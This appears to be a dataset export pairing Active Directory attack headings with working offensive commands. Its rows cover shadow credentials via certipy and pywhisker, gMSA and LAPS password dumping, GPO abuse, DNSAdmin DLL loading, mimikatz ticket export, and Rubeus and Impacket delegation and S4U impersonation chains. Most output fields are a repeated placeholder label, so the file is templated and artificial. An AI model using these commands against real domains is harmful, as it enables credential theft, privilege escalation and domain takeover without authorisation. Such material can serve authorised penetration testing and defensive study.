instruction
stringclasses
270 values
input
stringlengths
3
214
output
stringclasses
297 values
Can change msDS-KeyCredentialLInk (Generic Write) + ADCS
certipy shadow auto '-u <user>@<domain>' -p <password> -account '<target_account>'
Note or procedural step under 'Can change msDS-KeyCredentialLInk (Generic Write) + ADCS'.
Can change msDS-KeyCredentialLInk (Generic Write) + ADCS
pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "CERTIFICATE_PASSWORD" --target "TARGET_SAMNAME" --action "list"
Note or procedural step under 'Can change msDS-KeyCredentialLInk (Generic Write) + ADCS'.
On Group
GenericAll/GenericWrite/Self/Add Extended Rights
Note or procedural step under 'On Group'.
On Group
Add member to the group
Note or procedural step under 'On Group'.
On Group
Write Owner
Note or procedural step under 'On Group'.
On Group
Grant Ownership
Note or procedural step under 'On Group'.
On Group
WriteDACL + WriteOwner
Note or procedural step under 'On Group'.
On Group
Grant rights
Note or procedural step under 'On Group'.
On Group
Give yourself generic all
Note or procedural step under 'On Group'.
On Computer
GenericAll / GenericWrite
Note or procedural step under 'On Computer'.
On Computer
msDs-AllowedToActOnBehalf
Note or procedural step under 'On Computer'.
On Computer
add Key Credentials
Note or procedural step under 'On Computer'.
On User
GenericAll / GenericWrite
Note or procedural step under 'On User'.
On User
Change password
Note or procedural step under 'On User'.
On User
add SPN (target kerberoasting)
Note or procedural step under 'On User'.
On User
add key credentials
Note or procedural step under 'On User'.
On User
login script
Note or procedural step under 'On User'.
On User
ForceChangePassword
Note or procedural step under 'On User'.
On User
net user <user> <password> /domain
Note or procedural step under 'On User'.
On OU
Write Dacl
Note or procedural step under 'On OU'.
On OU
ACE Inheritance
Note or procedural step under 'On OU'.
On OU
Grant rights
Note or procedural step under 'On OU'.
On OU
GenericAll / GenericWrite / Manage Group Policy Links
Note or procedural step under 'On OU'.
On OU
OUned.py --config config.ini
Note or procedural step under 'On OU'.
ReadGMSAPassword
gMSADumper.py -u '<user>' -p '<password>' -d '<domain>'
Note or procedural step under 'ReadGMSAPassword'.
ReadGMSAPassword
nxc ldap <ip> -u <user> -p <pass> --gmsa
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
ReadGMSAPassword
ldeep ldap -u <user> -p <password> -d <domain> -s ldaps://<dc_ip> gmsa
Note or procedural step under 'ReadGMSAPassword'.
Get LAPS passwords
Who can read LAPS
Note or procedural step under 'Get LAPS passwords'.
Get LAPS passwords
MATCH p=(g:Base)-[:ReadLAPSPassword]->(c:Computer) RETURN p
Note or procedural step under 'Get LAPS passwords'.
Get LAPS passwords
Read LAPS
Note or procedural step under 'Get LAPS passwords'.
Get LAPS passwords
Get-LapsADPassword -DomainController <ip_dc> -Credential <domain>\<login> | Format-Table -AutoSize
Note or procedural step under 'Get LAPS passwords'.
Get LAPS passwords
ldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> laps
Note or procedural step under 'Get LAPS passwords'.
Get LAPS passwords
foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}
Note or procedural step under 'Get LAPS passwords'.
Get LAPS passwords
nxc ldap <dc_ip> -d <domain> -u <user> -p <password> --module laps
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Get LAPS passwords
msf> use post/windows/gather/credentials/enum_laps
Tool or command referenced under 'Get LAPS passwords'.
GPO
Who can control GPOs
Note or procedural step under 'GPO'.
GPO
MATCH p=((n:Base)-[]->(gp:GPO)) RETURN p
Note or procedural step under 'GPO'.
GPO
SID of principals that can create new GPOs in the domain
Note or procedural step under 'GPO'.
GPO
Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=blah,DC=com" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl
Note or procedural step under 'GPO'.
GPO
Return the principals that can write to the GP-Link attribute on OUs
Note or procedural step under 'GPO'.
GPO
Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN, SecurityIdentifier | fl
Note or procedural step under 'GPO'.
GPO
Generic Write on GPO
Note or procedural step under 'GPO'.
GPO
Abuse GPO
Note or procedural step under 'GPO'.
DNS Admin
DNSadmins abuse (CVE-2021-40469)
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
DNS Admin
dnscmd.exe /config /serverlevelplugindll <\\path\to\dll> # need a dnsadmin user
Note or procedural step under 'DNS Admin'.
DNS Admin
sc \\DNSServer stop dns sc \\DNSServer start dns
Note or procedural step under 'DNS Admin'.
Find delegation
findDelegation.py "<domain>"/"<user>":"<password>"
Note or procedural step under 'Find delegation'.
Find delegation
With BloodHound
Note or procedural step under 'Find delegation'.
Find delegation
Unconstrained
Note or procedural step under 'Find delegation'.
Find delegation
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
Note or procedural step under 'Find delegation'.
Find delegation
MATCH (c:User {unconstraineddelegation:true}) RETURN c
Note or procedural step under 'Find delegation'.
Find delegation
Constrained
Note or procedural step under 'Find delegation'.
Find delegation
MATCH p=((c:Base)-[:AllowedToDelegate]->(t:Computer)) RETURN p
Note or procedural step under 'Find delegation'.
Find delegation
MATCH p=shortestPath((u:User)-[*1..]->(c:Computer {name: "<MYTARGET.FQDN>"})) RETURN p
Note or procedural step under 'Find delegation'.
Unconstrained delegation
UAC: ADS_UF_TRUSTED_FOR_DELEGATION
Note or procedural step under 'Unconstrained delegation'.
Unconstrained delegation
Force connection with coerce
Note or procedural step under 'Unconstrained delegation'.
Unconstrained delegation
Get tickets
Note or procedural step under 'Unconstrained delegation'.
Unconstrained delegation
mimikatz privilege::debug sekurlsa::tickets /export sekurlsa::tickets /export
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Unconstrained delegation
Rubeus.exe dump /service:krbtgt /nowrap
Tool or command referenced under 'Unconstrained delegation'.
Unconstrained delegation
Rubeus.exe dump /luid:0xdeadbeef /nowrap
Tool or command referenced under 'Unconstrained delegation'.
Unconstrained delegation
Rubeus.exe monitor /interval:5
Tool or command referenced under 'Unconstrained delegation'.
Constrained delegation
With protocol transition (any) UAC: TRUST_TO_AUTH_FOR_DELEGATION
Note or procedural step under 'Constrained delegation'.
Constrained delegation
Get TGT for user
Note or procedural step under 'Constrained delegation'.
Constrained delegation
Request S4u2self
Note or procedural step under 'Constrained delegation'.
Constrained delegation
Request S4u2proxy
Note or procedural step under 'Constrained delegation'.
Constrained delegation
Rubeus.exe hash /password:<password>
Tool or command referenced under 'Constrained delegation'.
Constrained delegation
Rubeus.exe asktgt /user:<user> /domain:<domain> /aes256:<AES 256 hash>
Tool or command referenced under 'Constrained delegation'.
Constrained delegation
Rubeus.exe s4u /ticket:<ticket> /impersonateuser:<admin_user> /msdsspn:<spn_constrained> /altservice:<altservice> /ptt
Tool or command referenced under 'Constrained delegation'.
Constrained delegation
Altservice HTTP/HOST/CIFS/LDAP
Note or procedural step under 'Constrained delegation'.
Constrained delegation
getST.py -spn '<spn>/<target>' -impersonate Administrator -dc-ip '<dc_ip>' '<domain>/<user>:<password>' -altservice <altservice>
Note or procedural step under 'Constrained delegation'.
Constrained delegation
Altservice HTTP/HOST/CIFS/LDAP
Note or procedural step under 'Constrained delegation'.
Constrained delegation
Without protocol transition (kerberos only) UAC: TRUSTED_FOR_DELEGATION
Note or procedural step under 'Constrained delegation'.
Constrained delegation
Constrain between Y and Z
Note or procedural step under 'Constrained delegation'.
Constrained delegation
Add computer X
Note or procedural step under 'Constrained delegation'.
Constrained delegation
Add RBCD : delegate from X to Y
Note or procedural step under 'Constrained delegation'.
Constrained delegation
s4u2self X (impersonate admin)
Note or procedural step under 'Constrained delegation'.
Constrained delegation
S4u2Proxy X (impersonate admin on spn/Y)
Note or procedural step under 'Constrained delegation'.
Constrained delegation
Forwardable TGS for Y
Note or procedural step under 'Constrained delegation'.
Constrained delegation
S4u2Proxy Y (impersonate admin on spn/Z)
Note or procedural step under 'Constrained delegation'.
Constrained delegation
add computer account
Note or procedural step under 'Constrained delegation'.
Constrained delegation
addcomputer.py -computer-name '<computer_name>' -computer-pass '<ComputerPassword>' -dc-host <dc> -domain-netbios <domain_netbios> '<domain>/<user>:<password>'
Note or procedural step under 'Constrained delegation'.
Constrained delegation
RBCD With added computer account
Note or procedural step under 'Constrained delegation'.
Constrained delegation
rbcd.py -delegate-from '<rbcd_con>$' -delegate-to '<constrained>$' -dc-ip '<dc>' -action 'write' -hashes '<hash>' <domain>/<constrained>$
Note or procedural step under 'Constrained delegation'.
Constrained delegation
getST.py -spn host/<constrained> -impersonate Administrator --dc-ip <dc_ip> '<domain>/<rbcd_con>$:<rbcd_conpass>'
Note or procedural step under 'Constrained delegation'.
Constrained delegation
getST.py -spn <constrained_spn>/<target> -hashes '<hash>' '<domain>/<constrained>$' -impersonate Administrator --dc-ip <dc_ip> -additional-ticket <previous_ticket>
Note or procedural step under 'Constrained delegation'.
Constrained delegation
Self RBCD
Note or procedural step under 'Constrained delegation'.
Constrained delegation
Like RBCD without add computer
Note or procedural step under 'Constrained delegation'.
Resource-Based Constrained Delegation
add computer account
Note or procedural step under 'Resource-Based Constrained Delegation'.
Resource-Based Constrained Delegation
addcomputer.py -computer-name '<computer_name>' -computer-pass '<ComputerPassword>' -dc-host <dc> -domain-netbios <domain_netbios> '<domain>/<user>:<password>'
Note or procedural step under 'Resource-Based Constrained Delegation'.
Resource-Based Constrained Delegation
RBCD With added computer account
Note or procedural step under 'Resource-Based Constrained Delegation'.
Resource-Based Constrained Delegation
Rubeus.exe hash /password:<computer_pass> /user:<computer> /domain:<domain>
Tool or command referenced under 'Resource-Based Constrained Delegation'.
Resource-Based Constrained Delegation
Rubeus.exe s4u /user:<fake_computer$> /aes256:<AES 256 hash> /impersonateuser:administrator /msdsspn:cifs/<victim.domain.local> /altservice:krbtgt,cifs,host,http,winrm,RPCSS,wsman,ldap /domain:domain.local /ptt
Tool or command referenced under 'Resource-Based Constrained Delegation'.
Resource-Based Constrained Delegation
rbcd.py -delegate-from '<computer>$' -delegate-to '<target>$' -dc-ip '<dc>' -action 'write' <domain>/<user>:<password>
Note or procedural step under 'Resource-Based Constrained Delegation'.
Resource-Based Constrained Delegation
getST.py -spn host/<dc_fqdn> '<domain>/<computer_account>:<computer_pass>' -impersonate Administrator --dc-ip <dc_ip> #Kerberos TGT
Note or procedural step under 'Resource-Based Constrained Delegation'.
S4U2self abuse
Get machine account (X)'s TGT
Note or procedural step under 'S4U2self abuse'.
S4U2self abuse
Get a ST on X as user admin
Note or procedural step under 'S4U2self abuse'.
S4U2self abuse
getTGT.py -dc-ip "<dc_ip>" -hashes :"<machine_hash>" "<domain>"/"<machine>$"
Note or procedural step under 'S4U2self abuse'.
S4U2self abuse
getST.py -self -impersonate "<admin>" -altservice "cifs/<machine>" -k -no-pass -dc-ip "DomainController" "<domain>"/'<machine>$' #Admin
Note or procedural step under 'S4U2self abuse'.
Enumeration
certutil -v -dsTemplate
Note or procedural step under 'Enumeration'.
Enumeration
certify.exe find [ /vulnerable]
Note or procedural step under 'Enumeration'.